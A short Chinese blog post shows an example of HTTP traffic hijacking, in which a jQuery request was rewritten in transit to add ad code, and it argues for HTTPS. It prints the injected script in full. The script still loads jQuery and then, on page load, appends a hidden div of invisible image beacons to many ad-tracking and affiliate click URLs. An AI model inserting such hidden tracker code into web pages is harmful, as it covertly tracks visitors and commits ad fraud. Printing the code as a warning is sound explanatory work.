下面是一个向网络获取jquery被植入广告的例子,例子中并不是向第三方CDN获取jquery,jquery文件本身是没有问题的,问题在于HTTP数据包在网络传输过程中被改写。改写的人依然加载jquery,但会额外增加广告代码。https的使用变得越来越有必要性。
document.write("<script type='text/javascript' src=\"http://m.100week.cn/js/jquery-1.10.2.min.js?tn=170711\"></script>"),
window.onload=function() {
var oDiv = document.createElement('div');
oDiv.innerHTML="<div style='display: none;'><img src='https://lnk0.com/Ud4c8c'/><img src='https://global.ymtracking.com/trace?offer_id=6824425&aff_id=100787'/><img src='https://global.ymtracking.com/trace?offer_id=3799392&aff_id=103341&aff_sub8=xr084gd'/><img src='http://s2s.codrim.net/clickRedirect?pcid=AFbyuy'/><img src='http://m.onelink.me/e9c0b4ca'/><img src='http://t.cn/R9mnMN3'/><img src='https://lnk0.com/ocM544'/><img src='http://union.uc.cn/public/icl.php?appid=586871187&ch=chenjieuc@iios17'/><img src='https://at.umeng.com/b8LDeu'/><img src='http://svr.dotinapp.com/ics?sid=1414&adid=4007761'/><img src='http://app.renxi.net:8181/pdb/xhtml.do?adid=50'/><img src='http://uri6.com/tkio/JnmEria'/><img src='https://isdtuis.papa91.com/ac/v/LzRjnG
'/><img src='http://uri6.com/tkio/NzMnUna'/></div>";
document.body.appendChild(oDiv);
};
评论